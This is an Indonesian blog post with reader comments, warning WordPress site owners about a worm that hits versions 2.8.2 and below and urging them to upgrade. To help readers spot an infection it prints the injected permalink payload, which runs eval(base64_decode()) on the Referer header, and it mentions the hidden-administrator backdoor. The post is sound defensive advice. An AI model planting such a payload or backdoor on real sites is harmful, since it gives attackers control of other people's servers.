24

Serangan worm terhadap WordPress versi lama

Info gambar

Sekitar 2 hari ini, banyak beredar berita tentang penyerangan di blog/situs oleh worm yang masih menggunakan WordPress versi lama (versi 2.8.2 kebawah). Karena begitu pentingnya masalah keamanan ini, sangat disarankan untuk segera upgdare sebelum membaca artikel ini.

Ini juga disebutkan oleh salah satu pengembang wordpress sendiri (matt)
untuk segera upgrade ke versi terbaru ( 2.8.4 saat ini)

Salah satu blog yang menyebutkan masalah keamanan ini adalah Lorelle di artikelnya Old WordPress Versions Under Attack, dan menyarankan segera upgrade ke versi 2.8.4 sebelum membaca artikelnya karena begitu bahayanya celah keamanan ini.

Ada dua indikasi bahwa situs/blog yang menggunakan wordpress terkena serangan (hack) ini, yaitu :

  • Adanya tambahan aneh di setting permalink, misalnya example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/ Kata kuncinya adalah “eval” dan “base64_decode”
  • Indikasi kedua adalah adanya hidden Administrator. Perlu dicek adanya user dengan nama yang mencurigakan, misalnya “Administrator (2)”, dan kita tidak bisa mengakses account user ini atau menghapusnya..

Sebelum di upgrade, pastikan untuk membaca atau paling tidak tahu bagaimana cara meng-upgrade seperti misalnya backup database. Jika ada versi baru, maka di admin akan ada keterangan untuk mengupgrade ( berlaku versi 2.7 ke atas, dan tidak ada jika masih versi divawahnya).

Proses upgrade sebenarnya sangat mudah, tinggal klik Upgrade Now di menu admin wordpress, dan proses upgrade biasanya akan berjalan kurang dari 1 menit. Jika hal ini tidak bisa, mungkin fitur ini di matikan oleh penyedia hosting anda. Doba ditanyakan ke tempat membeli hosting anda.

Serangan ini hanya rentan untuk situs/blog yang menggunakan installasi wordpress sendiri, tidak berlaku di blog wordpress.com.

Referensi
Old WordPress Versions Under Attack
How to Keep WordPress Secure

ebta

24 Comments

  1. Assalamu’alaikum wr. wb.
    Untung gw lum punya blog/site, jd ga begitu pusing… Hehehe…
    Nb. NOMER 2 (DUA) BRO…

  2. Waduh serem juga neh.blog saya untuk ga di instalasi dikomputer melainkan langsung ke wordpressnya jadi ga perlu repot and takut.mas ebta mank blognya di hosting dimana ci?

  3. Waduh lupa pengen tanya neh mas ebta,gimana buat tabel postingan di wordpress?kaya excel gitu.ko saya cari fiturnya ga ada ya di editor wordpress mas!

  4. Kalo saya upgrade wordpress gak automatic hanya manual, terkadang automatic sering ada file yang tidak ter upgrade, apalagi jika koneksi lambat. 🙂 😛 😀 😆

  5. Punya saya msih versi lama, mudah2an aman. karena dengan atomatic update kadang error saat sesi upload file di 30% akhir file, sehingga membuat postingan lama jadi hilang, dan blog tidak bisa dibuka lagi dan harus menghubungi penyewa hosting ditambah postingan lama pada kacau balau.


  6. Deprecated: Function create_function() is deprecated in /var/www/html/ebsoft.web.id/wp-content/plugins/wp-spamshield/wp-spamshield.php on line 1961

    @Stenesia
    wa’alaikumsalaam warahmatullah wabarokatuh
    🙂

    @Ifank funky
    saya hosting di bluehost
    buat manual misalnya dengan open office, dreamweaver,frontpage dll

    @yuda
    Iya.. seperti tulisan diatas

    @Andy
    Sejak ada automatic update, saya lebih milih itu, karena upload manual cukup lama

    @masjaliteng
    iya di wordpress.com aman2 saja

  7. udah coba pakai wp dilocalhost sama bantu admin wp keliatannya bagus wp tapi masih pusing pakainya saya masih lebih mudeng pakai joomla walaupun joomla kurang fleksible buat blog karena ga ada comment built in harus pakai extension
    wah blogger indo pakai wp semua saya ketinggalan nie 🙁
    kira2 drupal bagus ga ya buat blog (yg ini juga pusing pakainya)

  8. One thorn of ugg sale experience is worth a whole wilderness of warning. Practical wisdom is only to be learned in the ugg cardy boots school of

  9. Bener tuh blog ku juga pernah mengalamai hal demikian, ada hidden administrator yang tidak bisa di buka detailnya, salah satu jalan ilanginnya lewat phpmyadmin.

Comments are closed.